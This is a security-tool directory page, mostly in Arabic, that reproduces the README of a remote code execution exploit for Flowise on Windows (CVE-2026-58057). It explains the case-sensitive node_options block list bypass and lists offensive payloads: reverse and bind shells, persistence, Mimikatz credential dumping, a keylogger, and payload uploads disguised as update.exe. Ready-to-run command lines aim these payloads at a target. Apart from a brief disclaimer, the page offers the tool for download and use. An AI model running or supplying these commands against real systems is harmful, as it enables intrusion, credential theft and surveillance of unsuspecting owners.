Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only. Flowise أداة استغلال لثغرة RCE على ويندوز (CVE-2026-58057). تتجاوز التحقق من متغيرات البيئة من خلال ثغرة في حساسية حالة الأحرف. تستخدم node_options لحقن كود عشوائي عبر MCP stdio. تدعم الصدفة العكسية، الثبات، رفع الملفات، تفريغ بيانات الاعتماد. للاستخدام في اختبارات الأمان المصرح بها فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
آليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
تطوير الحمولات
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

عرض المستودع
122منذ 2 أشهرلم تتم المراجعة بعد

حول

Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only. Flowise أداة استغلال لثغرة RCE على ويندوز (CVE-2026-58057). تتجاوز التحقق من متغيرات البيئة من خلال ثغرة في حساسية حالة الأحرف. تستخدم node_options لحقن كود عشوائي عبر MCP stdio. تدعم الصدفة العكسية، الثبات، رفع الملفات، تفريغ بيانات الاعتماد. للاستخدام في اختبارات الأمان المصرح بها فقط.

مشاركة

Flowise CVE-2026-58057 - استغلال تنفيذ الأوامر عن بُعد على ويندوز

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 نظرة عامة

هذا استغلال إنتاجي للثغرة CVE-2026-58057، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد في Flowise على منصات ويندوز. تنشأ الثغرة من التحقق الحساس لحالة الأحرف في متغيرات البيئة، والذي يفشل في حظر node_options بحروف صغيرة، مما يسمح للمهاجمين بتجاوز القائمة السوداء لـ NODE_OPTIONS وتنفيذ كود عشوائي من خلال تكوين MCP stdio المخصص.

يظهر الاستغلال ممارسات هندسة برمجية احترافية بهندسة معيارية، ومعالجة شاملة للأخطاء، ودعم لأنواع متعددة من الحمولات.

f1

f2

⚠️ إخلاء مسؤولية

هام: هذه الأداة مخصصة لاختبار الاختراق المأذون به، واختبارات الاختراق، والأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. احصل دائمًا على التصريح المناسب قبل اختبار أي نظام.

🔍 التفاصيل الفنية

السبب الجذري للثغرة

# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

آلية الاستغلال

  1. يقوم المهاجم بمصادقة Flowise

  2. يقوم بإنشاء/تعديل عقدة MCP stdio مخصصة

  3. يحقن متغير بيئة node_options بحروف صغيرة

  4. يضع القيمة على --require malicious-loader.js

  5. يقوم Node.js بتنفيذ المحمّل عند تشغيل MCP stdio

  6. يتم تحقيق تنفيذ كود عشوائي

✨ الميزات

القدرات الأساسية

  • ✅ Shell عكسي - اتصال عكسي بجهاز المهاجم

  • ✅ Shell مقيد - فتح منفذ استماع على الهدف

  • ✅ تنفيذ أوامر - تشغيل أوامر نظام عشوائية

  • ✅ رفع ملفات - رفع ملفات إلى النظام الهدف

  • ✅ ثباتية - آليات ثباتية متعددة

  • ✅ جمع معلومات - جمع معلومات استخباراتية عن النظام

  • ✅ تفريغ بيانات الاعتماد - تكامل مع Mimikatz

  • ✅ التقاط لقطة شاشة - التقاط لقطات شاشة لسطح المكتب

  • ✅ تسجيل المفاتيح - تثبيت قدرة تسجيل المفاتيح

الميزات التقنية

  • 🔐 طرق مصادقة متعددة - مفتاح API أو اسم مستخدم/كلمة مرور

  • 🔄 منطق إعادة المحاولة التلقائي - مقاوم للمشكلات الشبكية

  • 🧹 التنظيف الذاتي - إزالة ملفات المحمّل من الهدف

  • 🌐 متعدد المنصات - يعمل على ويندوز/لينكس/macOS

  • 🎨 إخراج ملون - تحسين قابلية القراءة

  • 📊 تصحيح مطوّل - تسجيل مفصل لاستكشاف الأخطاء

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أعلى

  • pip (مدير حزم بايثون)

التثبيت السريع

# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

التثبيت عبر Docker (اختياري)

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 الاستخدام

خيارات سطر الأوامر

python3 exploit.py --help

خيارات المصادقة

الخيارالوصفمثال
-t, --targetرابط Flowise (مطلوب)http://localhost:3000
-k, --api-keyمفتاح API Flowiseflowise_abc123...
-u, --usernameاسم المستخدمadmin
-p, --passwordكلمة المرورpassword123

خيارات الحمولة

الخيارالوصفمثال
--payloadنوع الحمولةreverse_shell
--lhostعنوان المستقبل192.168.1.100
--lportمنفذ المستقبل4444
--commandالأمر المراد تنفيذهwhoami
--local-fileالملف المراد رفعهpayload.exe
--remote-pathالمسار البعيد للحفظC:\\Temp\\update.exe

خيارات التنفيذ

الخيارالوصف
--interactiveبدء شل تفاعلي
--verboseتمكين الإخراج التفصيلي
--timeoutمهلة الطلب بالثواني
--retriesعدد محاولات إعادة المحاولة

📝 أمثلة الاستخدام

1. شل عكسي أساسي

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. شل عكسي تفاعلي

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. تنفيذ أوامر

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. رفع ملف

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. تفريغ بيانات الاعتماد (Mimikatz)

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. تثبيت الثباتية

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. جمع المعلومات

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. التقاط لقطة شاشة

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 أنواع الحمولات

الحمولةالوصفالوسائط
reverse_shellاتصال عكسي بالمستقبل--lhost, --lport
bind_shellفتح منفذ استماع--lport
command_execتنفيذ أمر--command
file_uploadرفع ملف إلى الهدف--local-file, --remote-path
persistenceتثبيت الثباتيةلا يوجد
info_gatherجمع معلومات النظاملا يوجد
mimikatzتفريغ بيانات الاعتمادلا يوجد
screenshotالتقاط لقطة شاشةلا يوجد
keyloggerتثبيت مسجل المفاتيحلا يوجد

🛡️ التخفيف

ترقية Flowise

تنزيل الأداة